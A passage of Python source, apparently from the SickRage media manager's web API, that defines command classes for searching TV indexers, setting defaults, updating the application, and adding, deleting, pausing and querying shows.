            "indexerid": {"desc": "Unique ID of a show"},
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
            "lang": {"desc": "The 2-letter language code of the desired show"},
        }
    }
    def __init__(self, args, kwargs):
        # mapping of 2-letter language codes to indexer language ids
        self.valid_languages = sickbeard.indexerApi().config['langabbv_to_id']
        # required
        # optional
        self.name, args = self.check_params(args, kwargs, "name", None, False, "string", [])
        self.lang, args = self.check_params(args, kwargs, "lang", sickbeard.INDEXER_DEFAULT_LANGUAGE, False, "string",
                                            self.valid_languages.keys())
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, False, "int", [])
        # NOTE(review): run() reads self.indexer, which is never assigned here --
        # presumably supplied by ApiCall.__init__ from the request; confirm
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)
    def run(self):
        """ Search for a show with a given name on all the indexers, in a specific language """
        results = []
        lang_id = self.valid_languages[self.lang]
        if self.name and not self.indexerid:  # only name was given
            # query every indexer (or just the selected one) by show name
            for _indexer in sickbeard.indexerApi().indexers if self.indexer == 0 else [int(self.indexer)]:
                lINDEXER_API_PARMS = sickbeard.indexerApi(_indexer).api_params.copy()
                if self.lang and not self.lang == sickbeard.INDEXER_DEFAULT_LANGUAGE:
                    lINDEXER_API_PARMS['language'] = self.lang
                lINDEXER_API_PARMS['actors'] = False
                lINDEXER_API_PARMS['custom_ui'] = classes.AllShowsListUI
                t = sickbeard.indexerApi(_indexer).indexer(**lINDEXER_API_PARMS)
                try:
                    apiData = t[str(self.name).encode()]
                except (sickbeard.indexer_shownotfound, sickbeard.indexer_showincomplete, sickbeard.indexer_error):
                    logger.log(u"API :: Unable to find show with id " + str(self.indexerid), logger.WARNING)
                    continue
                for curSeries in apiData:
                    results.append({indexer_ids[_indexer]: int(curSeries['id']),
                                    "name": curSeries['seriesname'],
                                    "first_aired": curSeries['firstaired'],
                                    "indexer": int(_indexer)})
            return _responds(RESULT_SUCCESS, {"results": results, "langid": lang_id})
        elif self.indexerid:
            # look the show up directly by its indexer id
            for _indexer in sickbeard.indexerApi().indexers if self.indexer == 0 else [int(self.indexer)]:
                lINDEXER_API_PARMS = sickbeard.indexerApi(_indexer).api_params.copy()
                if self.lang and not self.lang == sickbeard.INDEXER_DEFAULT_LANGUAGE:
                    lINDEXER_API_PARMS['language'] = self.lang
                lINDEXER_API_PARMS['actors'] = False
                t = sickbeard.indexerApi(_indexer).indexer(**lINDEXER_API_PARMS)
                try:
                    myShow = t[int(self.indexerid)]
                except (sickbeard.indexer_shownotfound, sickbeard.indexer_showincomplete, sickbeard.indexer_error):
                    logger.log(u"API :: Unable to find show with id " + str(self.indexerid), logger.WARNING)
                    return _responds(RESULT_SUCCESS, {"results": [], "langid": lang_id})
                if not myShow.data['seriesname']:
                    logger.log(
                        u"API :: Found show with indexerid: " + str(
                            self.indexerid) + ", however it contained no show name", logger.DEBUG)
                    return _responds(RESULT_FAILURE, msg="Show contains no name, invalid result")
                # found show
                results = [{indexer_ids[_indexer]: int(myShow.data['id']),
                            "name": unicode(myShow.data['seriesname']),
                            "first_aired": myShow.data['firstaired'],
                            "indexer": int(_indexer)}]
                break
            return _responds(RESULT_SUCCESS, {"results": results, "langid": lang_id})
        else:
            return _responds(RESULT_FAILURE, msg="Either a unique id or name is required!")
class CMD_SickBeardSearchTVDB(CMD_SickBeardSearchIndexers):
    _help = {
        "desc": "Search for a show with a given name on The TVDB, in a specific language",
        "optionalParameters": {
            "name": {"desc": "The name of the show you want to search for"},
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
            "lang": {"desc": "The 2-letter language code of the desired show"},
        }
    }
    def __init__(self, args, kwargs):
        # the parent parses name/lang/indexerid; afterwards a given "tvdbid"
        # parameter overrides indexerid so legacy tvdbid callers keep working
        CMD_SickBeardSearchIndexers.__init__(self, args, kwargs)
        self.indexerid, args = self.check_params(args, kwargs, "tvdbid", None, False, "int", [])
class CMD_SickBeardSearchTVRAGE(CMD_SickBeardSearchIndexers):
    """
    Deprecated, TVRage is no more.
    """
    _help = {
        "desc":
            "Search for a show with a given name on TVRage, in a specific language. "
            "This command should not longer be used, as TVRage was shut down.",
        "optionalParameters": {
            "name": {"desc": "The name of the show you want to search for"},
            "lang": {"desc": "The 2-letter language code of the desired show"},
        }
    }

    def __init__(self, args, kwargs):
        # deliberately bypass CMD_SickBeardSearchIndexers.__init__: no parameter
        # parsing is needed since every request is rejected outright
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        # TVRage has shut down, so this endpoint always reports failure
        return _responds(RESULT_FAILURE, msg="TVRage is no more, invalid result")
class CMD_SickBeardSetDefaults(ApiCall):
    """ Persist the defaults that new shows are created with. """
    _help = {
        "desc": "Set SickRage's user default configuration value",
        "optionalParameters": {
            "initial": {"desc": "The initial quality of a show"},
            "archive": {"desc": "The archive quality of a show"},
            "future_show_paused": {"desc": "True to list paused shows in the coming episode, False otherwise"},
            "flatten_folders": {"desc": "Flatten sub-folders within the show directory"},
            "status": {"desc": "Status of missing episodes"},
        }
    }

    def __init__(self, args, kwargs):
        # required
        # optional
        self.initial, args = self.check_params(args, kwargs, "initial", None, False, "list",
                                               ["sdtv", "sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
                                                "fullhdwebdl", "hdbluray", "fullhdbluray", "unknown"])
        self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list",
                                               ["sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
                                                "fullhdwebdl", "hdbluray", "fullhdbluray"])
        self.future_show_paused, args = self.check_params(args, kwargs, "future_show_paused", None, False, "bool", [])
        self.flatten_folders, args = self.check_params(args, kwargs, "flatten_folders", None, False, "bool", [])
        self.status, args = self.check_params(args, kwargs, "status", None, False, "string",
                                              ["wanted", "skipped", "ignored"])
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Set SickRage's user default configuration value """
        # map the API quality keywords onto the internal Quality constants
        quality_map = {'sdtv': Quality.SDTV,
                       'sddvd': Quality.SDDVD,
                       'hdtv': Quality.HDTV,
                       'rawhdtv': Quality.RAWHDTV,
                       'fullhdtv': Quality.FULLHDTV,
                       'hdwebdl': Quality.HDWEBDL,
                       'fullhdwebdl': Quality.FULLHDWEBDL,
                       'hdbluray': Quality.HDBLURAY,
                       'fullhdbluray': Quality.FULLHDBLURAY,
                       'unknown': Quality.UNKNOWN}
        iqualityID = [quality_map[quality] for quality in self.initial] if self.initial else []
        aqualityID = [quality_map[quality] for quality in self.archive] if self.archive else []
        if iqualityID or aqualityID:
            sickbeard.QUALITY_DEFAULT = Quality.combineQualities(iqualityID, aqualityID)
        if self.status:
            # convert the string status to an int
            for status in statusStrings.statusStrings:
                if statusStrings[status].lower() == str(self.status).lower():
                    self.status = status
                    break
            # this should be obsolete because of the above
            if self.status not in statusStrings.statusStrings:
                raise ApiError("Invalid Status")
            # only allow the status options we want
            if int(self.status) not in (3, 5, 6, 7):
                raise ApiError("Status Prohibited")
            sickbeard.STATUS_DEFAULT = self.status
        # `is not None`: False is a valid value for both of these booleans
        if self.flatten_folders is not None:
            sickbeard.FLATTEN_FOLDERS_DEFAULT = int(self.flatten_folders)
        if self.future_show_paused is not None:
            sickbeard.COMING_EPS_DISPLAY_PAUSED = int(self.future_show_paused)
        return _responds(RESULT_SUCCESS, msg="Saved defaults")
class CMD_SickBeardShutdown(ApiCall):
    """ Ask the running process to shut down. """
    _help = {"desc": "Shutdown SickRage"}

    def __init__(self, args, kwargs):
        # no required or optional parameters for this command
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Shutdown SickRage """
        if Shutdown.stop(sickbeard.PID):
            return _responds(RESULT_SUCCESS, msg="SickRage is shutting down...")
        return _responds(RESULT_FAILURE, msg='SickRage can not be shut down')
class CMD_SickBeardUpdate(ApiCall):
    _help = {"desc": "Update SickRage to the latest version available"}

    def __init__(self, args, kwargs):
        # required
        # optional
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Check for a newer version and, if safe, trigger the update. """
        version_checker = CheckVersion()
        # guard clauses: bail out early when there is nothing to do or the
        # config could not be backed up before updating
        if not version_checker.check_for_new_version():
            return _responds(RESULT_FAILURE, msg="SickRage is already up to date")
        if not version_checker.run_backup_if_safe():
            return _responds(RESULT_FAILURE, msg="SickRage could not backup config ...")
        version_checker.update()
        return _responds(RESULT_SUCCESS, msg="SickRage is updating ...")
class CMD_Show(ApiCall):
    # API command: return a dict with the full details of one show.
    _help = {
        "desc": "Get detailed information about a show",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
        }
    }
    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        # optional
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)
    def run(self):
        """ Get detailed information about a show """
        showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
        if not showObj:
            return _responds(RESULT_FAILURE, msg="Show not found")
        showDict = {}
        # delegate to the sibling API commands to build the season list and
        # image-cache status, reusing only their "data" payloads
        showDict["season_list"] = CMD_ShowSeasonList((), {"indexerid": self.indexerid}).run()["data"]
        showDict["cache"] = CMD_ShowCache((), {"indexerid": self.indexerid}).run()["data"]
        genreList = []
        if showObj.genre:
            # genre is stored as a pipe-separated string; drop empty entries
            genreListTmp = showObj.genre.split("|")
            for genre in genreListTmp:
                if genre:
                    genreList.append(genre)
        showDict["genre"] = genreList
        showDict["quality"] = get_quality_string(showObj.quality)
        anyQualities, bestQualities = _mapQuality(showObj.quality)
        showDict["quality_details"] = {"initial": anyQualities, "archive": bestQualities}
        try:
            showDict["location"] = showObj.location
        except ShowDirectoryNotFoundException:
            # the show's folder is missing on disk; report an empty location
            showDict["location"] = ""
        showDict["language"] = showObj.lang
        showDict["show_name"] = showObj.name
        # boolean flags are exposed as 0/1 ints for the JSON API
        showDict["paused"] = (0, 1)[showObj.paused]
        showDict["subtitles"] = (0, 1)[showObj.subtitles]
        showDict["air_by_date"] = (0, 1)[showObj.air_by_date]
        showDict["flatten_folders"] = (0, 1)[showObj.flatten_folders]
        showDict["sports"] = (0, 1)[showObj.sports]
        showDict["anime"] = (0, 1)[showObj.anime]
        # normalize the airs string ("8pm" -> "8 PM") and collapse double spaces
        showDict["airs"] = str(showObj.airs).replace('am', ' AM').replace('pm', ' PM').replace('  ', ' ')
        showDict["dvdorder"] = (0, 1)[showObj.dvdorder]
        if showObj.rls_require_words:
            showDict["rls_require_words"] = showObj.rls_require_words.split(", ")
        else:
            showDict["rls_require_words"] = []
        if showObj.rls_ignore_words:
            showDict["rls_ignore_words"] = showObj.rls_ignore_words.split(", ")
        else:
            showDict["rls_ignore_words"] = []
        showDict["scene"] = (0, 1)[showObj.scene]
        showDict["archive_firstmatch"] = (0, 1)[showObj.archive_firstmatch]
        showDict["indexerid"] = showObj.indexerid
        # index 1 of the indexer mapping is the tvdb id (see helpers.mapIndexersToShow)
        showDict["tvdbid"] = helpers.mapIndexersToShow(showObj)[1]
        showDict["imdbid"] = showObj.imdbid
        showDict["network"] = showObj.network
        if not showDict["network"]:
            showDict["network"] = ""
        showDict["status"] = showObj.status
        if showObj.nextaired:
            # convert the stored next-air ordinal into the user's timezone,
            # then reformat both the airs string and the airdate for display
            dtEpisodeAirs = sbdatetime.sbdatetime.convert_to_setting(
                network_timezones.parse_date_time(showObj.nextaired, showDict['airs'], showDict['network']))
            showDict['airs'] = sbdatetime.sbdatetime.sbftime(dtEpisodeAirs, t_preset=timeFormat).lstrip('0').replace(
                ' 0', ' ')
            showDict['next_ep_airdate'] = sbdatetime.sbdatetime.sbfdate(dtEpisodeAirs, d_preset=dateFormat)
        else:
            showDict['next_ep_airdate'] = ''
        return _responds(RESULT_SUCCESS, showDict)
class CMD_ShowAddExisting(ApiCall):
    # API command: queue a show whose folder already exists on disk.
    _help = {
        "desc": "Add an existing show in SickRage",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
            "location": {"desc": "Full path to the existing shows's folder"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
            "initial": {"desc": "The initial quality of the show"},
            "archive": {"desc": "The archive quality of the show"},
            "flatten_folders": {"desc": "True to flatten the show folder, False otherwise"},
            "subtitles": {"desc": "True to search for subtitles, False otherwise"},
        }
    }
    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "", [])
        self.location, args = self.check_params(args, kwargs, "location", None, True, "string", [])
        # optional
        self.initial, args = self.check_params(args, kwargs, "initial", None, False, "list",
                                               ["sdtv", "sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
                                                "fullhdwebdl", "hdbluray", "fullhdbluray", "unknown"])
        self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list",
                                               ["sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
                                                "fullhdwebdl", "hdbluray", "fullhdbluray"])
        self.flatten_folders, args = self.check_params(args, kwargs, "flatten_folders",
                                                       bool(sickbeard.FLATTEN_FOLDERS_DEFAULT), False, "bool", [])
        self.subtitles, args = self.check_params(args, kwargs, "subtitles", int(sickbeard.USE_SUBTITLES),
                                                 False, "int", [])
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)
    def run(self):
        """ Add an existing show in SickRage """
        showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
        if showObj:
            return _responds(RESULT_FAILURE, msg="An existing indexerid already exists in the database")
        if not ek(os.path.isdir, self.location):
            return _responds(RESULT_FAILURE, msg='Not a valid location')
        indexerName = None
        # resolve the show name via the indexer-search command
        # NOTE(review): self.indexer is not set in this __init__ — presumably
        # populated by ApiCall/check_params from the id parameter; confirm.
        indexerResult = CMD_SickBeardSearchIndexers([], {indexer_ids[self.indexer]: self.indexerid}).run()
        if indexerResult['result'] == result_type_map[RESULT_SUCCESS]:
            if not indexerResult['data']['results']:
                return _responds(RESULT_FAILURE, msg="Empty results returned, check indexerid and try again")
            if len(indexerResult['data']['results']) == 1 and 'name' in indexerResult['data']['results'][0]:
                indexerName = indexerResult['data']['results'][0]['name']
        if not indexerName:
            return _responds(RESULT_FAILURE, msg="Unable to retrieve information from indexer")
        # set indexer so we can pass it along when adding show to SR
        indexer = indexerResult['data']['results'][0]['indexer']
        # map the API's lowercase quality names onto the internal Quality codes
        quality_map = {'sdtv': Quality.SDTV,
                       'sddvd': Quality.SDDVD,
                       'hdtv': Quality.HDTV,
                       'rawhdtv': Quality.RAWHDTV,
                       'fullhdtv': Quality.FULLHDTV,
                       'hdwebdl': Quality.HDWEBDL,
                       'fullhdwebdl': Quality.FULLHDWEBDL,
                       'hdbluray': Quality.HDBLURAY,
                       'fullhdbluray': Quality.FULLHDBLURAY,
                       'unknown': Quality.UNKNOWN}
        # use default quality as a failsafe
        newQuality = int(sickbeard.QUALITY_DEFAULT)
        iqualityID = []
        aqualityID = []
        if self.initial:
            for quality in self.initial:
                iqualityID.append(quality_map[quality])
        if self.archive:
            for quality in self.archive:
                aqualityID.append(quality_map[quality])
        if iqualityID or aqualityID:
            newQuality = Quality.combineQualities(iqualityID, aqualityID)
        # hand the actual add off to the show queue; episodes start as SKIPPED
        sickbeard.showQueueScheduler.action.addShow(int(indexer), int(self.indexerid), self.location, SKIPPED,
                                                    newQuality, int(self.flatten_folders))
        return _responds(RESULT_SUCCESS, {"name": indexerName}, indexerName + " has been queued to be added")
class CMD_ShowAddNew(ApiCall):
    # API command: queue a brand-new show (folder may be created here).
    _help = {
        "desc": "Add a new show to SickRage",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
            "initial": {"desc": "The initial quality of the show"},
            "location": {"desc": "The path to the folder where the show should be created"},
            "archive": {"desc": "The archive quality of the show"},
            "flatten_folders": {"desc": "True to flatten the show folder, False otherwise"},
            "status": {"desc": "The status of missing episodes"},
            "lang": {"desc": "The 2-letter language code of the desired show"},
            "subtitles": {"desc": "True to search for subtitles, False otherwise"},
            "anime": {"desc": "True to mark the show as an anime, False otherwise"},
            "scene": {"desc": "True if episodes search should be made by scene numbering, False otherwise"},
            "future_status": {"desc": "The status of future episodes"},
            "archive_firstmatch": {"desc": "True if episodes should be archived when first match is downloaded, False otherwise"},
        }
    }
    def __init__(self, args, kwargs):
        # valid 2-letter language codes accepted for the "lang" parameter
        self.valid_languages = sickbeard.indexerApi().config['langabbv_to_id']
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        # optional
        self.location, args = self.check_params(args, kwargs, "location", None, False, "string", [])
        self.initial, args = self.check_params(args, kwargs, "initial", None, False, "list",
                                               ["sdtv", "sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
                                                "fullhdwebdl", "hdbluray", "fullhdbluray", "unknown"])
        self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list",
                                               ["sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
                                                "fullhdwebdl", "hdbluray", "fullhdbluray"])
        self.flatten_folders, args = self.check_params(args, kwargs, "flatten_folders",
                                                       bool(sickbeard.FLATTEN_FOLDERS_DEFAULT), False, "bool", [])
        self.status, args = self.check_params(args, kwargs, "status", None, False, "string",
                                              ["wanted", "skipped", "ignored"])
        self.lang, args = self.check_params(args, kwargs, "lang", sickbeard.INDEXER_DEFAULT_LANGUAGE, False, "string",
                                            self.valid_languages.keys())
        self.subtitles, args = self.check_params(args, kwargs, "subtitles", bool(sickbeard.USE_SUBTITLES),
                                                 False, "bool", [])
        self.anime, args = self.check_params(args, kwargs, "anime", bool(sickbeard.ANIME_DEFAULT), False,
                                             "bool", [])
        self.scene, args = self.check_params(args, kwargs, "scene", bool(sickbeard.SCENE_DEFAULT), False,
                                             "bool", [])
        self.future_status, args = self.check_params(args, kwargs, "future_status", None, False, "string",
                                                     ["wanted", "skipped", "ignored"])
        self.archive_firstmatch, args = self.check_params(args, kwargs, "archive_firstmatch",
                                                          bool(sickbeard.ARCHIVE_DEFAULT), False, "bool", [])
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)
    def run(self):
        """ Add a new show to SickRage """
        showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
        if showObj:
            return _responds(RESULT_FAILURE, msg="An existing indexerid already exists in database")
        if not self.location:
            # no explicit location given: fall back to the configured default
            # root dir (ROOT_DIRS is "defaultIndex|dir1|dir2|...")
            if sickbeard.ROOT_DIRS != "":
                root_dirs = sickbeard.ROOT_DIRS.split('|')
                root_dirs.pop(0)
                default_index = int(sickbeard.ROOT_DIRS.split('|')[0])
                self.location = root_dirs[default_index]
            else:
                return _responds(RESULT_FAILURE, msg="Root directory is not set, please provide a location")
        if not ek(os.path.isdir, self.location):
            return _responds(RESULT_FAILURE, msg="'" + self.location + "' is not a valid location")
        # map the API's lowercase quality names onto the internal Quality codes
        quality_map = {'sdtv': Quality.SDTV,
                       'sddvd': Quality.SDDVD,
                       'hdtv': Quality.HDTV,
                       'rawhdtv': Quality.RAWHDTV,
                       'fullhdtv': Quality.FULLHDTV,
                       'hdwebdl': Quality.HDWEBDL,
                       'fullhdwebdl': Quality.FULLHDWEBDL,
                       'hdbluray': Quality.HDBLURAY,
                       'fullhdbluray': Quality.FULLHDBLURAY,
                       'unknown': Quality.UNKNOWN}
        # use default quality as a failsafe
        newQuality = int(sickbeard.QUALITY_DEFAULT)
        iqualityID = []
        aqualityID = []
        if self.initial:
            for quality in self.initial:
                iqualityID.append(quality_map[quality])
        if self.archive:
            for quality in self.archive:
                aqualityID.append(quality_map[quality])
        if iqualityID or aqualityID:
            newQuality = Quality.combineQualities(iqualityID, aqualityID)
        # use default status as a failsafe
        newStatus = sickbeard.STATUS_DEFAULT
        if self.status:
            # convert the string status to a int
            for status in statusStrings.statusStrings:
                if statusStrings[status].lower() == str(self.status).lower():
                    self.status = status
                    break
            # TODO: check if obsolete
            if not self.status in statusStrings.statusStrings:
                raise ApiError("Invalid Status")
            # only allow the status options we want
            if int(self.status) not in (WANTED, SKIPPED, IGNORED):
                return _responds(RESULT_FAILURE, msg="Status prohibited")
            newStatus = self.status
        # use default status as a failsafe
        default_ep_status_after = sickbeard.STATUS_DEFAULT_AFTER
        if self.future_status:
            # convert the string status to a int
            for status in statusStrings.statusStrings:
                if statusStrings[status].lower() == str(self.future_status).lower():
                    self.future_status = status
                    break
            # TODO: check if obsolete
            if not self.future_status in statusStrings.statusStrings:
                raise ApiError("Invalid Status")
            # only allow the status options we want
            if int(self.future_status) not in (WANTED, SKIPPED, IGNORED):
                return _responds(RESULT_FAILURE, msg="Status prohibited")
            default_ep_status_after = self.future_status
        indexerName = None
        # resolve the show name via the indexer-search command
        # NOTE(review): self.indexer is presumably set by ApiCall/check_params
        # from the id parameter — confirm against the base class.
        indexerResult = CMD_SickBeardSearchIndexers([], {indexer_ids[self.indexer]: self.indexerid}).run()
        if indexerResult['result'] == result_type_map[RESULT_SUCCESS]:
            if not indexerResult['data']['results']:
                return _responds(RESULT_FAILURE, msg="Empty results returned, check indexerid and try again")
            if len(indexerResult['data']['results']) == 1 and 'name' in indexerResult['data']['results'][0]:
                indexerName = indexerResult['data']['results'][0]['name']
        if not indexerName:
            return _responds(RESULT_FAILURE, msg="Unable to retrieve information from indexer")
        # set indexer for found show so we can pass it along
        indexer = indexerResult['data']['results'][0]['indexer']
        # moved the logic check to the end in an attempt to eliminate empty directory being created from previous errors
        showPath = ek(os.path.join, self.location, helpers.sanitizeFileName(indexerName))
        # don't create show dir if config says not to
        if sickbeard.ADD_SHOWS_WO_DIR:
            logger.log(u"Skipping initial creation of " + showPath + " due to config.ini setting")
        else:
            dir_exists = helpers.makeDir(showPath)
            if not dir_exists:
                logger.log(u"API :: Unable to create the folder " + showPath + ", can't add the show", logger.ERROR)
                return _responds(RESULT_FAILURE, {"path": showPath},
                                 "Unable to create the folder " + showPath + ", can't add the show")
            else:
                helpers.chmodAsParent(showPath)
        # queue the actual add; the show queue does the heavy lifting
        sickbeard.showQueueScheduler.action.addShow(int(indexer), int(self.indexerid), showPath, newStatus,
                                                    newQuality,
                                                    int(self.flatten_folders), self.lang, self.subtitles, self.anime,
                                                    self.scene, default_status_after=default_ep_status_after, archive=self.archive_firstmatch)  # @UndefinedVariable
        return _responds(RESULT_SUCCESS, {"name": indexerName}, indexerName + " has been queued to be added")
class CMD_ShowCache(ApiCall):
    _help = {
        "desc": "Check SickRage's cache to see if the images (poster, banner, fanart) for a show are valid",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
        }
    }

    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        # optional
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Report (as 0/1 flags) whether the poster and banner images for a show exist in the image cache. """
        showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
        if not showObj:
            return _responds(RESULT_FAILURE, msg="Show not found")
        # TODO: catch if cache dir is missing/invalid.. so it doesn't break show/show.cache
        # return {"poster": 0, "banner": 0}
        cache_obj = image_cache.ImageCache()
        results = {"poster": 0, "banner": 0}
        if ek(os.path.isfile, cache_obj.poster_path(showObj.indexerid)):
            results["poster"] = 1
        if ek(os.path.isfile, cache_obj.banner_path(showObj.indexerid)):
            results["banner"] = 1
        return _responds(RESULT_SUCCESS, results)
class CMD_ShowDelete(ApiCall):
    _help = {
        "desc": "Delete a show in SickRage",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
            "removefiles": {
                "desc": "True to delete the files associated with the show, False otherwise. This can not be undone!"
            },
        }
    }

    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        # optional
        self.removefiles, args = self.check_params(args, kwargs, "removefiles", False, False, "bool", [])
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Queue a show for deletion, optionally removing its files. """
        error_message, show = Show.delete(self.indexerid, self.removefiles)
        if error_message is not None:
            return _responds(RESULT_FAILURE, msg=error_message)
        return _responds(RESULT_SUCCESS, msg='%s has been queued to be deleted' % show.name)
class CMD_ShowGetQuality(ApiCall):
    _help = {
        "desc": "Get the quality setting of a show",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
        }
    }

    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        # optional
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Return the show's initial and archive quality lists. """
        showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
        if not showObj:
            return _responds(RESULT_FAILURE, msg="Show not found")
        initial, archive = _mapQuality(showObj.quality)
        return _responds(RESULT_SUCCESS, {"initial": initial, "archive": archive})
class CMD_ShowGetPoster(ApiCall):
    _help = {
        "desc": "Get the poster of a show",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
        }
    }

    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        # optional
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Get the poster of a show """
        response = {'outputType': 'image'}
        response['image'] = ShowPoster(self.indexerid)
        return response
class CMD_ShowGetBanner(ApiCall):
    _help = {
        "desc": "Get the banner of a show",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
        }
    }

    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        # optional
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Get the banner of a show """
        response = {'outputType': 'image'}
        response['image'] = ShowBanner(self.indexerid)
        return response
class CMD_ShowGetNetworkLogo(ApiCall):
    _help = {
        "desc": "Get the network logo of a show",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
        }
    }

    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        # optional
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Get the network logo of a show """
        response = {'outputType': 'image'}
        response['image'] = ShowNetworkLogo(self.indexerid)
        return response
class CMD_ShowGetFanArt(ApiCall):
    _help = {
        "desc": "Get the fan art of a show",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
        }
    }

    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        # optional
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Get the fan art of a show """
        response = {'outputType': 'image'}
        response['image'] = ShowFanArt(self.indexerid)
        return response
class CMD_ShowPause(ApiCall):
    _help = {
        "desc": "Pause or unpause a show",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
            "pause": {"desc": "True to pause the show, False otherwise"},
        }
    }

    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        # optional
        self.pause, args = self.check_params(args, kwargs, "pause", False, False, "bool", [])
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Pause or unpause a show """
        error_message, show = Show.pause(self.indexerid, self.pause)
        if error_message is not None:
            return _responds(RESULT_FAILURE, msg=error_message)
        # report the state the show ended up in
        state = 'paused' if show.paused else 'resumed'
        return _responds(RESULT_SUCCESS, msg='%s has been %s' % (show.name, state))
class CMD_ShowRefresh(ApiCall):
    _help = {
        "desc": "Refresh a show in SickRage",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
        }
    }

    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        # optional
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Queue a refresh of the show's data from disk. """
        error_message, show = Show.refresh(self.indexerid)
        if error_message is not None:
            return _responds(RESULT_FAILURE, msg=error_message)
        return _responds(RESULT_SUCCESS, msg='%s has queued to be refreshed' % show.name)
class CMD_ShowSeasonList(ApiCall):
    _help = {
        "desc": "Get the list of seasons of a show",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
            "sort": {"desc": "Return the seasons in ascending or descending order"}
        }
    }

    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        # optional
        self.sort, args = self.check_params(args, kwargs, "sort", "desc", False, "string", ["asc", "desc"])
        # super, missing, help
